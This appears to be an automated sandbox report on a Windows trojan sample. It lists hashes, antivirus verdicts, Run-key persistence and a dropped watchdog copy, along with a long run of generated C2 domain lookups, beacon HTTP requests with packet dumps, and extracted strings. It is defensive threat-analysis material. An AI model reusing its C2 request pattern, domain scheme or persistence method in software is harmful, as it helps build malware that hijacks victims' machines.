Analysis Date2014-12-02 20:52:22
MD5184ec9974e342dc614bd7369dd160960
SHA14127944d8484015ebe59ee7dcd91a218fd5272bb

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 70297009d87be5002870dbb862645390 sha1: dd455de91306c6ad472f9191989eedd9bf523527 size: 120832
Section.rdata md5: dc495631e40d8fa85d83ae69755f65a2 sha1: 5dd5c393a552aa8a03303103327013721676e309 size: 16384
Section.data md5: 8255924ccbcb22a9cd062b1b03c44b19 sha1: 5350dfdaad78fa80ec46cf5fc1905ea176e0d43f size: 17920
Timestamp2014-01-22 06:52:33
PackerMicrosoft Visual C++ ?.?
PEhashbd25086574155e3559e0c9fa0be0ef3a6be18cf2
IMPhash0afd6e2315ceb5a75384dccb12e1c5a6
AV360 SafeGen:Variant.Symmi.42055
AVAd-AwareGen:Variant.Symmi.42055
AVAlwil (avast)Downloader-UVI [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/A-9c219440!Eldorado
AVAvira (antivir)TR/Crypt.ZPACK.Gen8
AVBullGuardGen:Variant.Symmi.42055
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. Webno_virus
AVEmsisoftGen:Variant.Symmi.42055
AVEset (nod32)Win32/Agent.VNC
AVFortinetW32/Generic.RRM!tr
AVFrisk (f-prot)no_virus
AVF-SecureGen:Variant.Symmi.42055
AVGrisoft (avg)Generic_r.DMA
AVIkarusTrojan.FBLock
AVK7Unwanted-Program ( 004a8e8a1 )
AVKasperskyTrojan.Win32.Generic:Trojan.Win32.PEF.pf.silent.342863:Trojan.Win32.PEF.pf.silent.347637:Trojan.Win32.PEF.pf.silent.348577:Trojan.Win32.PEF.pf.silent.349979:Trojan.Win32.PEF.pf.silent.349247:Trojan.Win32.PEF.pf.silent.376163:Trojan.Win32.PEF.pf.silent.375505:Trojan.Win32.PEF.pf.silent.377057:Trojan.Win32.PEF.pf.silent.377789:Trojan.Win32.PEF.pf.silent.378627:Trojan.Win32.PEF.pf.silent.379268:Trojan.Win32.PEF.pf.silent.380179:Trojan.Win32.PEF.pf.silent.380996:Trojan.Win32.PEF.pf.silent.433356:Trojan.Win32.PEF.pf.silent.453058:Trojan.Win32.PEF.pf.silent.467723
AVMalwareBytesTrojan.Agent
AVMcafeeGeneric-FAOV!184EC9974E34
AVMicrosoft Security Essentialsno_virus
AVMicroWorld (escan)Gen:Variant.Symmi.42055
AVNormanGen:Variant.Symmi.42055
AVRisingno_virus
AVSophosTroj/Bckdr-RRM
AVSymantecno_virus
AVTrend Microno_virus
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Launcher Control Detection IKE Remote Transfer ➝
C:\Documents and Settings\Administrator\Application Data\lzkljdimbxvh\eofjmsfq.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\lzkljdimbxvh\eofjmsfq.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\lzkljdimbxvh\eofjmsfq.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\lzkljdimbxvh\eofjmsfq.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\lzkljdimbxvh\lryjnsccf.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\lzkljdimbxvh\eofjmsfq.pfp7
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\lzkljdimbxvh\eofjmsfq.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\lzkljdimbxvh\eofjmsfq.exe"

Network Details:

DNSclassproduce.net
Type: A
216.21.239.197
DNSmiddleworth.net
Type: A
50.63.202.36
DNSthinkmethod.net
Type: A
210.224.177.104
DNSthinkaction.net
Type: A
50.63.202.35
DNSthinkdirect.net
Type: A
208.91.197.27
DNScollegedirect.net
Type: A
66.151.181.49
DNSclassbetween.net
Type: A
DNSthickproduce.net
Type: A
DNSthickstudent.net
Type: A
DNSclassstudent.net
Type: A
DNSthinkround.net
Type: A
DNSpresentround.net
Type: A
DNSthinkglossary.net
Type: A
DNSpresentglossary.net
Type: A
DNSthinklikely.net
Type: A
DNSpresentlikely.net
Type: A
DNSthinkworth.net
Type: A
DNSpresentworth.net
Type: A
DNSchiefround.net
Type: A
DNScollegeround.net
Type: A
DNSchiefglossary.net
Type: A
DNScollegeglossary.net
Type: A
DNSchieflikely.net
Type: A
DNScollegelikely.net
Type: A
DNSchiefworth.net
Type: A
DNScollegeworth.net
Type: A
DNSoftenround.net
Type: A
DNSaloneround.net
Type: A
DNSoftenglossary.net
Type: A
DNSaloneglossary.net
Type: A
DNSoftenlikely.net
Type: A
DNSalonelikely.net
Type: A
DNSoftenworth.net
Type: A
DNSaloneworth.net
Type: A
DNSmiddleround.net
Type: A
DNStwelveround.net
Type: A
DNSmiddleglossary.net
Type: A
DNStwelveglossary.net
Type: A
DNSmiddlelikely.net
Type: A
DNStwelvelikely.net
Type: A
DNStwelveworth.net
Type: A
DNSratherround.net
Type: A
DNSmorninground.net
Type: A
DNSratherglossary.net
Type: A
DNSmorningglossary.net
Type: A
DNSratherlikely.net
Type: A
DNSmorninglikely.net
Type: A
DNSratherworth.net
Type: A
DNSmorningworth.net
Type: A
DNSstrangeround.net
Type: A
DNShistoryround.net
Type: A
DNSstrangeglossary.net
Type: A
DNShistoryglossary.net
Type: A
DNSstrangelikely.net
Type: A
DNShistorylikely.net
Type: A
DNSstrangeworth.net
Type: A
DNShistoryworth.net
Type: A
DNSamountround.net
Type: A
DNSweatherround.net
Type: A
DNSamountglossary.net
Type: A
DNSweatherglossary.net
Type: A
DNSamountlikely.net
Type: A
DNSweatherlikely.net
Type: A
DNSamountworth.net
Type: A
DNSweatherworth.net
Type: A
DNSthickround.net
Type: A
DNSclassround.net
Type: A
DNSthickglossary.net
Type: A
DNSclassglossary.net
Type: A
DNSthicklikely.net
Type: A
DNSclasslikely.net
Type: A
DNSthickworth.net
Type: A
DNSclassworth.net
Type: A
DNSpresentmethod.net
Type: A
DNSpresentaction.net
Type: A
DNSpresentdirect.net
Type: A
DNSthinkbrought.net
Type: A
DNSpresentbrought.net
Type: A
DNSchiefmethod.net
Type: A
DNScollegemethod.net
Type: A
DNSchiefaction.net
Type: A
DNScollegeaction.net
Type: A
DNSchiefdirect.net
Type: A
DNSchiefbrought.net
Type: A
DNScollegebrought.net
Type: A
HTTP GEThttp://classproduce.net/forum/search.php?email=babyphat_yo@yahoo.com&method=post
User-Agent:
HTTP GEThttp://middleworth.net/forum/search.php?email=babyphat_yo@yahoo.com&method=post
User-Agent:
HTTP GEThttp://thinkmethod.net/forum/search.php?email=babyphat_yo@yahoo.com&method=post
User-Agent:
HTTP GEThttp://thinkaction.net/forum/search.php?email=babyphat_yo@yahoo.com&method=post
User-Agent:
HTTP GEThttp://thinkdirect.net/forum/search.php?email=babyphat_yo@yahoo.com&method=post
User-Agent:
HTTP GEThttp://collegedirect.net/forum/search.php?email=babyphat_yo@yahoo.com&method=post
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 216.21.239.197:80
Flows TCP192.168.1.1:1032 ➝ 50.63.202.36:80
Flows TCP192.168.1.1:1033 ➝ 210.224.177.104:80
Flows TCP192.168.1.1:1034 ➝ 50.63.202.35:80
Flows TCP192.168.1.1:1035 ➝ 208.91.197.27:80
Flows TCP192.168.1.1:1036 ➝ 66.151.181.49:80

Raw Pcap
0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 62616279   h.php?email=baby
0x00000020 (00032)   70686174 5f796f40 7961686f 6f2e636f   phat_yo@yahoo.co
0x00000030 (00048)   6d266d65 74686f64 3d706f73 74204854   m&method=post HT
0x00000040 (00064)   54502f31 2e300d0a 41636365 70743a20   TP/1.0..Accept: 
0x00000050 (00080)   2a2f2a0d 0a436f6e 6e656374 696f6e3a   */*..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a20636c    close..Host: cl
0x00000070 (00112)   61737370 726f6475 63652e6e 65740d0a   assproduce.net..
0x00000080 (00128)   0d0a                                  ..

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 62616279   h.php?email=baby
0x00000020 (00032)   70686174 5f796f40 7961686f 6f2e636f   phat_yo@yahoo.co
0x00000030 (00048)   6d266d65 74686f64 3d706f73 74204854   m&method=post HT
0x00000040 (00064)   54502f31 2e300d0a 41636365 70743a20   TP/1.0..Accept: 
0x00000050 (00080)   2a2f2a0d 0a436f6e 6e656374 696f6e3a   */*..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a206d69    close..Host: mi
0x00000070 (00112)   64646c65 776f7274 682e6e65 740d0a0d   ddleworth.net...
0x00000080 (00128)   0a0a                                  ..

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 62616279   h.php?email=baby
0x00000020 (00032)   70686174 5f796f40 7961686f 6f2e636f   phat_yo@yahoo.co
0x00000030 (00048)   6d266d65 74686f64 3d706f73 74204854   m&method=post HT
0x00000040 (00064)   54502f31 2e300d0a 41636365 70743a20   TP/1.0..Accept: 
0x00000050 (00080)   2a2f2a0d 0a436f6e 6e656374 696f6e3a   */*..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a207468    close..Host: th
0x00000070 (00112)   696e6b6d 6574686f 642e6e65 740d0a0d   inkmethod.net...
0x00000080 (00128)   0a0a                                  ..

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 62616279   h.php?email=baby
0x00000020 (00032)   70686174 5f796f40 7961686f 6f2e636f   phat_yo@yahoo.co
0x00000030 (00048)   6d266d65 74686f64 3d706f73 74204854   m&method=post HT
0x00000040 (00064)   54502f31 2e300d0a 41636365 70743a20   TP/1.0..Accept: 
0x00000050 (00080)   2a2f2a0d 0a436f6e 6e656374 696f6e3a   */*..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a207468    close..Host: th
0x00000070 (00112)   696e6b61 6374696f 6e2e6e65 740d0a0d   inkaction.net...
0x00000080 (00128)   0a0a                                  ..

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 62616279   h.php?email=baby
0x00000020 (00032)   70686174 5f796f40 7961686f 6f2e636f   phat_yo@yahoo.co
0x00000030 (00048)   6d266d65 74686f64 3d706f73 74204854   m&method=post HT
0x00000040 (00064)   54502f31 2e300d0a 41636365 70743a20   TP/1.0..Accept: 
0x00000050 (00080)   2a2f2a0d 0a436f6e 6e656374 696f6e3a   */*..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a207468    close..Host: th
0x00000070 (00112)   696e6b64 69726563 742e6e65 740d0a0d   inkdirect.net...
0x00000080 (00128)   0a0a                                  ..

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 62616279   h.php?email=baby
0x00000020 (00032)   70686174 5f796f40 7961686f 6f2e636f   phat_yo@yahoo.co
0x00000030 (00048)   6d266d65 74686f64 3d706f73 74204854   m&method=post HT
0x00000040 (00064)   54502f31 2e300d0a 41636365 70743a20   TP/1.0..Accept: 
0x00000050 (00080)   2a2f2a0d 0a436f6e 6e656374 696f6e3a   */*..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a20636f    close..Host: co
0x00000070 (00112)   6c6c6567 65646972 6563742e 6e65740d   llegedirect.net.
0x00000080 (00128)   0a0d0a                                ...


Strings
.
-E-
-0
-0010+-0
0
-0CC
.00-+ 
.
-e-
. 
\
 
00
.
:\
:..
...........?- 
0
0
0
0
-
u
E(null)
                                 H
         (((((                  H
         h((((                  H
jjjjh
jjjjj
KERNEL32.DLL
mscoree.dll
                          
\$,_^[
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
0A@@Ju
0SSSSS
0WWWWW
1#QNAN
1#SNAN
1~<uoW
3dI!B0
;6> vz
8VVVVV
9ns-ka
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
ADVAPI32.dll
An application has made an attempt to load the C runtime library incorrectly.
<at9<rt,<wt
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
.?AVbad_alloc@std@@
.?AVbad_exception@std@@
.?AVexception@std@@
.?AVlength_error@std@@
.?AVlogic_error@std@@
.?AVout_of_range@std@@
.?AVtype_info@@
|$B8\$A
bad allocation
bad exception
 Base Class Array'
 Base Class Descriptor at (
__based(
BeginPaint
__cdecl
 Class Hierarchy Descriptor'
CloseHandle
__clrcall
CompareStringA
CompareStringW
 Complete Object Locator'
CONOUT$
`copy constructor closure'
CopyFileA
CorExitProcess
CreateDIBSection
CreateDirectoryA
CreateEventA
CreateFileA
CreateIconFromResourceEx
CreateProcessA
CreateStreamOnHGlobal
CreateThread
CreateToolhelp32Snapshot
CreateWindowExA
- CRT not initialized
D$,_^]
D$(_^][
D$0;D$
@.data
D<c}@> \
dddd, MMMM dd, yyyy
December
DecodePointer
`default constructor closure'
DefWindowProcA
 delete
 delete[]
Delete
DeleteCriticalSection
DestroyWindow
D$h_^[
DispatchMessageA
D$ JT~
DOMAIN error
D$p+D$h
D$P;D$T
D$PPQVS
DPtoLP
D$<pV@
D$t+D$l+
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
EncodePointer
EndPaint
EnterCriticalSection
ExitProcess
F;5`_B
__fastcall
February
FileTimeToLocalFileTime
FileTimeToSystemTime
FindClose
FindFirstFileA
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
FlushFileBuffers
ForceRemove
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Friday
^F<-uB
GAIsProcessorFeaturePresent
GDI32.dll
GetACP
GetActiveWindow
GetCommandLineA
GetConsoleCP
GetConsoleMode
GetConsoleOutputCP
GetCPInfo
GetCurrentDirectoryA
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDesktopWindow
GetDeviceCaps
GetDriveTypeA
GetEnvironmentStrings
GetEnvironmentStringsW
GetEnvironmentVariableA
GetFileSize
GetFileType
GetFullPathNameA
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetMapMode
GetMessageA
GetModuleFileNameA
GetModuleHandleA
GetModuleHandleW
GetOEMCP
GetProcAddress
GetProcessHeap
GetProcessWindowStation
GetStartupInfoA
GetStdHandle
GetStockObject
GetStringTypeA
GetStringTypeW
GetSystemTimeAsFileTime
GetTempPathA
GetTickCount
GetTimeZoneInformation
GetTitleBarInfo
GetUserObjectInformationA
GetUserObjectSecurity
GetWindowDC
GetWindowRect
GlobalAlloc
GlobalFree
GlobalLock
GlobalUnlock
`h````
\$ h(;B
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSize
`h`hhh
HH:mm:ss
HHtXHHt
>If90t
InitializeCriticalSectionAndSpinCount
InterlockedDecrement
InterlockedIncrement
InvalidateRect
invalid string position
}IQ/t,f
IsDebuggerPresent
IsValidCodePage
I".[WpA
>-|!)$J
j2h8WB
JanFebMarAprMayJunJulAugSepOctNovDec
January
j@j ^V
j"^SSSSS
:"JTK.%*
KERNEL32
KERNEL32.dll
L$8QPj
LCMapStringA
LCMapStringW
L$dRPQS
LeaveCriticalSection
L$LRPQ
\L%n.^
LoadCursorA
LoadLibraryA
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
L$PQRV
L$PQRVPP
L$PQRVWW
L$pQVPW
LPtoDP
L$ QUV
L$ SVQ
L$t_^][3
L$ WQP
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
MessageBoxA
Microsoft Visual C++ Runtime Library
MM/dd/yy
Monday
MoveWindow
.mrdIG9
MulDiv
MultiByteToWideChar
naf-Hj
 new[]
NoRemove
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
~Nr,J"
(null)
October
ole32.dll
OLEAUT32.dll
`omni callsig'
OpenProcess
operator
__pascal
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
PostQuitMessage
PPPPPPPP
Process32First
Process32Next
Program: 
<program name unknown>
__ptr64
- pure virtual function call
>q;|[<(
QQSVWd
QueryPerformanceCounter
RaiseException
`.rdata
ReadFile
RealizePalette
RegCloseKey
RegisterClassExA
RegOpenKeyA
RegSetValueExA
__restrict
RevertToSelf
RtlUnwind
runtime error 
Runtime Error!
R)_@+W
Saturday
`scalar deleting destructor'
September
SetEndOfFile
SetEnvironmentVariableA
SetEvent
SetFileAttributesA
SetFilePointer
SetFocus
SetHandleCount
SetLastError
SetMapMode
SetParent
SetStdHandle
SetUnhandledExceptionFilter
SetWindowsHookA
SetWindowsHookExA
SetWindowTextA
ShowWindow
SING error
s[S;7|G;w
^SSSSS
SSVhP%@
__stdcall
StretchDIBits
`string'
string too long
Sunday
SunMonTueWedThuFriSat
T$DRPQ
TerminateProcess
tGHt.Ht&
+t HHt
This application has requested the Runtime to terminate it in an unusual way.
__thiscall
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
Thursday
< tK<	tG
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
<\tM</tI
to=8pB
T$PRPV
T$PRPVWW
tR99u2
TranslateMessage
T$(RPPj
t"SS9]
TS[tOR
<+t(<-t$:
t$<"u	3
Tuesday
;t$,v-
t$(WSQ3
t+WWVPV
 Type Descriptor'
`typeof'
>:u8FV
`udt returning'
- unable to initialize heap
- unable to open console device
__unaligned
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UNICODE
Unknown exception
UpdateWindow
UQPXY]Y[
URPQQhP
USER32.dll
USER32.DLL
u[SSSP
UTF-16LE
v$;5\pB
`vbase destructor'
`vbtable'
`vcall'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`vftable'
VirtualAlloc
`virtual displacement map'
VirtualFree
v	N+D$
=VuVInz
_VVVVV
VVVVVQRSSj
WaitForSingleObject
Wednesday
WideCharToMultiByte
WriteConsoleA
WriteConsoleW
WriteFile
WS2_32.dll
^WWWWW
WY~-l,
xppwpp
xpxxxx
<xtX<XtT
yA20lq
>=Yt1j
Z<z<V%Xj